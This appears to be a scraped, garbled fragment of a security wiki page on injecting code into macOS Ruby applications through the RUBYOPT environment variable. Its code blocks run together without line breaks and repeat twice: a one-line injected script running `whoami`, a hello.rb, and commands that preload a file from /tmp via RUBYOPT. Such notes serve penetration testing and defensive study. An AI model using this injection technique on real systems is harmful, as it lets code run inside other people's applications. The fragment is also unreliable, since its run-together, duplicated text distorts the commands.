macOS Ruby Applications Injection
RUBYOPT
puts `whoami`puts 'Hello, World!'RUBYOPT="-I/tmp -rinject" ruby hello.rbRUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyoptLast updated
puts `whoami`puts 'Hello, World!'RUBYOPT="-I/tmp -rinject" ruby hello.rbRUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyoptLast updated